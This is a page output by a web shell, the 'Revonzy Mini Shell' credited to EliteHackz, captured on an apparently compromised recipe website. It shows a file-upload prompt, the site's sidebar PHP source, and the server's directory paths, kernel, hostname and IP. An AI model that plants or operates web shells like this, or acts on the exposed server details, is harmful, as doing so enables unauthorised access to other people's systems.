Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/kitchenfoodrecipes.com/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/kitchenfoodrecipes.com/right-side.php

<div class="col-md-4 col-lg-4 col-sm-12 col-xs-12 second_section">
    
      <div class="right_box_container right_top">
          <h4 class="right_titles">
              Search
          </h4>
		  <form action="category.php" method="POST">
			  <input type="text" name="search_box" placeholder="Enter your search word" class="input_box" required />
			  <button type="submit" name="custom_search_btn" class="read_more newsletter_submit">Submit</button>
		  </form>
      </div>

      <div class="right_box_container" style="margin-top:20px;">
          <h4 class="right_titles">
              Recent Posts
          </h4>
          <?php
            $recent_posts_data = array();
            $recent_posts_data = $db->get_multiple_rows_of_published_posts_right_side();

            if(!empty($recent_posts_data))
            {
                foreach($recent_posts_data as $recent_post_record)
                {
                    $recent_post_id  =   $recent_post_record[0];
                    $recent_post_title  =   $recent_post_record[2];
					
					$main_title = $db->get_name_of_post_from_id($recent_post_id);
					$seo_english_title = $db->get_page_english_title_from_post_id($recent_post_id);
					
					$displ_title_name = str_replace(" ","-",$seo_english_title);
             ?>
             <a href="<?php echo $project_base_url; ?>post.php?pid=<?php echo $recent_post_id; ?>&<?php echo $displ_title_name; ?>" class="recent_posts"><?php echo $main_title; ?></a>
             <?php       
                }
            }
          ?>
      </div>

      <div class="right_box_container" style="margin-top:20px;">
          <h4 class="right_titles">
              Share Us / Join Us
          </h4>
          <img src="<?php echo $project_base_url; ?>images/facebook-icon.png" alt="facebook social media icon" class="social_media_icon" />
          <img src="<?php echo $project_base_url; ?>images/google-plus-icon.png" alt="google plus social media icon" class="social_media_icon" />
          <img src="<?php echo $project_base_url; ?>images/youtube-icon.png" alt="youtube social media icon" class="social_media_icon" />
          <img src="<?php echo $project_base_url; ?>images/twitter-icon.png" alt="twitter social media icon" class="social_media_icon" />
          <img src="<?php echo $project_base_url; ?>images/instagram-icon.png" alt="instagram social media icon" class="social_media_icon" />
      </div>

      <div class="right_box_container" style="margin-top:20px;">
          <h4 class="right_titles">
              Newsletters
          </h4>
		  <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
			<input type="email" name="email_box" placeholder="Enter your email id" class="input_box" required />
			<button type="submit" name="newsletter_submit_btn" class="read_more newsletter_submit">Submit</button>
		  </form>
      </div>
    </div>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4